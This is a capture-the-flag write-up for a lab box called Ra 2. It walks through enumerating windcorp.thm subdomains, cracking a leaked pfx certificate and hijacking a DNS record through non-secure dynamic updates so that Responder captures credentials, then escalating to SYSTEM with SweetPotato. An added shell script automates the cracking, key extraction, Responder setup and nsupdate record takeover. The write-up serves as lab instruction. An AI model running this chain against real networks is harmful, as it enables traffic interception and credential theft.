Ra 2 Writeup
Enumeration
Taking a look at the initial nmap scan, it appears we are looking at a setup similar to the first Ra box. Let's take a look at the website and see if we have another intranet site to explore.
We instantly get redirected to fire.windcorp.thm, so let's add the domain and subdomain to our /etc/hosts file and take a look.
Taking a look at the intranet site, we can see that the password reset link is gone, but a self-service link is present, so we'll definitely be taking a look at that. Other than that, the rest of the site looks much the same.
The self-service link redirects us to another subdomain that we need to add to our hosts file. When we try to access that page we are prompted for basic authentication, so it seems we aren't going to get in just yet. Let's go back and keep enumerating.
Taking a quick look at the TLS certificate, we can see that it also lists a selfservice.dev.windcorp.thm name. That could definitely be interesting, so let's add it to our hosts file and see what we have.
Interesting, we have a page that says under construction. A quick look through the source doesn't reveal anything, so let's run this site through gobuster and see if we can find any hidden directories.
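The certificate check described above, as an added example that is not part of the original writeup: it pulls the TLS certificate from the intranet host with openssl, extracts the Subject Alternative Names, and turns them into /etc/hosts lines so nothing listed in the cert gets missed. The target host and IP are assumptions, and the sample SAN text embedded for offline use is constructed, not captured from the box.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup): enumerate hostnames from a TLS
# certificate's Subject Alternative Name extension and emit hosts-file lines.
set -eu

TARGET_HOST=fire.windcorp.thm
TARGET_IP=10.10.10.10   # assumed IP of the box; replace with yours

# Constructed sample of what `openssl x509 -ext subjectAltName` prints, so the
# parsing can be exercised offline. The names are assumptions, not the real cert.
SAMPLE_SAN='X509v3 Subject Alternative Name:
    DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm'

# Fetch the leaf certificate over TLS (SNI set so the right cert is served) and
# print only its SAN extension. Needs OpenSSL 1.1.1+ for the -ext option.
fetch_san() {
    openssl s_client -connect "$1:443" -servername "$1" </dev/null 2>/dev/null \
        | openssl x509 -noout -ext subjectAltName
}

# Read SAN output on stdin and print one "IP name" line per unique DNS entry.
# Commas are split into lines, DNS: entries are kept, duplicates dropped.
san_to_hosts() {
    ip=$1
    tr ',' '\n' \
        | sed -n 's/^[[:space:]]*DNS:\([^[:space:]]*\).*/\1/p' \
        | LC_ALL=C sort -u \
        | while read -r name; do printf '%s %s\n' "$ip" "$name"; done
}

# Offline demonstration on the constructed sample.
demo_hosts() {
    printf '%s\n' "$SAMPLE_SAN" | san_to_hosts "$TARGET_IP"
}

# Usage: ./san_hosts.sh live     (queries the target)
#        ./san_hosts.sh          (runs against the constructed sample)
case "${1:-}" in
    live) fetch_san "$TARGET_HOST" | san_to_hosts "$TARGET_IP" ;;
    "")   demo_hosts ;;
esac
```

Append the output to /etc/hosts rather than editing by hand; when the box exposes more virtual hosts than the page links to, the certificate is usually the quickest place to find them.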
Looks like we have a couple of interesting directories. Let's start with the backup directory and see what is in there.
Looks like we have a cert.pfx file and a web.config file. Let's download them and take a look to see if we can find anything.
Trying to download the web.config file results in a 404, which is interesting, but we are able to download cert.pfx.
Let's move on to the aspnet_client directory. We can enumerate its system_web subdirectory for a version-numbered folder, which tells us the .NET Framework version the server is running.
Looks like the running version is 4.0.30319. Probably not much use on its own, but it's an extra bit of information.
Let's scan the main intranet portal and see if we can find anything of interest.
Nothing really interesting here. Maybe we can try a larger wordlist and see if we get anything; I'll omit extensions with the larger list, though, otherwise we'll be waiting hours for the results.
Taking a look at our initial scan results, we can see a powershell directory which redirects to an aspx page. Let's take a look at this.
Interesting, but we still need credentials to access this page, which doesn't help us right now. We need to remember it, though.
Exploitation
Since nothing we've found so far gets us access, let's load up dnsrecon and see if there are any other domains we're missing.
Taking a look, we can see a TXT record which looks to be the first flag and also gives us our first hint: the server allows non-secure dynamic updates to its DNS records, meaning anyone who can reach the DNS server can rewrite them without a key. That will certainly come in handy. First, though, we need to try to crack the password on that pfx file so we can extract the certificate and key, then update the DNS records.
Using crackpkcs12 we were able to find the password for the pfx file, so we can now extract our crt and key files.
Before we can use Responder to capture the requests that our malicious DNS entry will redirect to us, we need to edit /etc/responder/Responder.conf so that its HTTPS server uses the certificate and key files we just extracted. Presenting the site's own certificate means the client sees a valid TLS handshake for the hostname and has no reason to refuse to authenticate.
After starting up Responder, we can go ahead and update the DNS records on the server using nsupdate.
First we need to delete the existing record, then we can add an A record for the same name that points to the IP address Responder is listening on.
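The whole chain from the pfx file to the rewritten A record, as an added example that is not code from the original writeup: crack the pfx password with crackpkcs12, split it into PEM certificate and key with openssl, point Responder's HTTPS listener at them, and then delete and re-add the A record with nsupdate. The file names, wordlist path, IP addresses, zone and the record name being hijacked are all assumptions; adjust them for your lab.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup): pfx crack -> cert/key extraction ->
# Responder TLS config -> non-secure DNS dynamic update with nsupdate.
set -eu

PFX=cert.pfx
WORDLIST=/usr/share/wordlists/rockyou.txt
DNS_SERVER=10.10.10.10               # assumed: the box, which serves the zone
ATTACKER_IP=10.9.0.1                 # assumed: where Responder listens
TARGET_FQDN=selfservice.windcorp.thm # assumed: the record we take over
ZONE=windcorp.thm
RESPONDER_CONF=/etc/responder/Responder.conf

# Step 1: dictionary attack on the pfx password. crackpkcs12 prints the hit on
# stdout; copy it out of the output and hand it to the prep step below.
crack_pfx() {
    crackpkcs12 -d "$WORDLIST" "$PFX"
}

# Step 2: split the pfx into a PEM certificate and an unencrypted PEM key.
extract_pfx() {
    pass=$1
    openssl pkcs12 -in "$PFX" -passin "pass:$pass" -clcerts -nokeys -out cert.crt
    openssl pkcs12 -in "$PFX" -passin "pass:$pass" -nocerts -nodes -out cert.key
}

# Step 3: make Responder's HTTPS server present the stolen certificate, so the
# victim's scripted check sees a valid cert for the name and sends its creds.
configure_responder() {
    sed -i "s|^SSLCert *=.*|SSLCert = $PWD/cert.crt|;s|^SSLKey *=.*|SSLKey = $PWD/cert.key|" \
        "$RESPONDER_CONF"
}

# Step 4: build the nsupdate batch. Deleting first removes the legitimate
# answer; the add then installs ours. No TSIG key is needed because the zone
# accepts non-secure dynamic updates (the hint from the TXT record).
build_nsupdate_batch() {
    fqdn=$1 ip=$2 server=$3 zone=$4
    printf 'server %s\nzone %s\nupdate delete %s A\nupdate add %s 300 A %s\nsend\n' \
        "$server" "$zone" "$fqdn" "$fqdn" "$ip"
}

hijack_record() {
    build_nsupdate_batch "$TARGET_FQDN" "$ATTACKER_IP" "$DNS_SERVER" "$ZONE" | nsupdate
}

# Step 5: confirm the server now answers with our address before waiting.
verify_record() {
    dig +short @"$DNS_SERVER" "$TARGET_FQDN" A
}

# Usage: PFX_PASS=<password from crack_pfx> ./hijack.sh prep
#        (start Responder, e.g. sudo responder -I tun0, then)
#        ./hijack.sh hijack
case "${1:-}" in
    prep)   extract_pfx "${PFX_PASS:?set PFX_PASS to the password crackpkcs12 found}"
            configure_responder ;;
    hijack) hijack_record
            verify_record ;;
esac
```

The delete-then-add pair is what makes the update clean: `update delete NAME A` strips every existing A record for the name, so the zone ends up with only the attacker's answer rather than two records that round-robin between the real host and Responder.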
And there we go. Oddly, two hashes come back; I'll work with the second one and crack that, as it's most likely the one we want.
And there we have it, we have some credentials. Let's try entering them into the powershell page we found and see if we can establish a connection to the machine.
And there we have it. Now we can grab our next flag and start enumerating the machine.
Taking a quick look around edwardle's directories, there's not much of interest. In the Documents folder we can see a cmd file; it just checks whether the selfservice portal is still working.
PrivEsc
In the Downloads folder we can also see a couple of exe files: nc.exe and SweetPotato.exe. SweetPotato.exe is the interesting one, as it is effectively the same as JuicyPotato and will let us gain SYSTEM-level permissions provided our user holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so let's check (whoami /priv) whether our user has either of these.
And there we have it: as you can see we are now the SYSTEM user, so we can go ahead and grab our 3rd and final flag!
It's probably worth noting that you usually wouldn't find a precompiled SweetPotato.exe sitting on a machine (I'd hope). I think the room creators decided to make this one a little easier by leaving a precompiled copy there so we don't need to go off and compile it ourselves.